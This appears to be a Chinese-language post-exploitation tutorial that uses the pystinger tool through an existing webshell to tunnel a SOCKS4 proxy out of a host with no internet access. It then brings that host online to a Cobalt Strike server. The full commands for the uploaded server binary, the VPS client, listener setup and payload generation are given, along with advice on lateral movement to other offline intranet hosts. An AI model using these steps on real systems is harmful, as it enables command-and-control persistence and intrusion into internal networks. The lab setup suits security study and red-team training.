获取到Webshell后,确定是该主机不出网,但是这台主机搭建了web服务器站点,因此可以采用pystinger来类似于映射的关系来上线CS。

优势:毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射.
坑点:cs可能会进入假死,需要把stinger_server.exe关掉然后再打开

10.251.251.129为不出网PC,我们要让他上线CS

下载地址
https://github.com/qianniaoge/pystinger
image.png
下载release有可执行文件
image.png
image.png

前言

虚拟机配置成仅主机模式,此使不可以上网
image.png
开一个phpstudy
image.png
环境搭建完毕。

pystinger演示socks4代理

此使我们获取了webshell,但是该主机不出网,我们目的是想让这台主机成功上线cs
1、上传proxy.php
image.png

2、上传stinger_server.exe
start stinger_server.exe 在目标主机启动
不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

然后在VPS上弄代理到对方站点上,因为这里我是在本地搭建的没有外网IP,所以使用本地windows10来演示

(VPS操作)stinger_client.exe -w http://10.251.251.129/proxy.php -l 0.0.0.0 -p 60000
image.png

此时已经在vps:127.0.0.1:60000 启动了一个10.251.251.129 :60020 所在内网的socks4a代理
image.png
那么也就意味着10.251.251.129:60020《——》VPS:127.0.0.1:60000通过web代理打通了

3、测试
此时socks代理成功,相当于起到了一个普通的Web正向代理
image.png

pystinger演示上线CS

受害目标主机 start D:/XXX/stinger_server.exe 0.0.0.0
VPS主机 stinger_client.exe -w http://10.251.251.129/proxy.php -l 0.0.0.0 -p 60000
此时VPS会起一个通道6000——10.251.251.129

监听器的配置(不管CS服务端起在哪里的都一样,可以上线本地CS+Pystinger)
image.png

成功上线一台CS
image.png
image.png

上线内网多台不出网的主机

  • beacons为为目标受害主机地址(10.251.251.129)
  • 生成payload,上传到主机运行后即可上线
  • 横向移动到其他主机时可以将payload指向 192.168.3.11:60020即可实现出网上线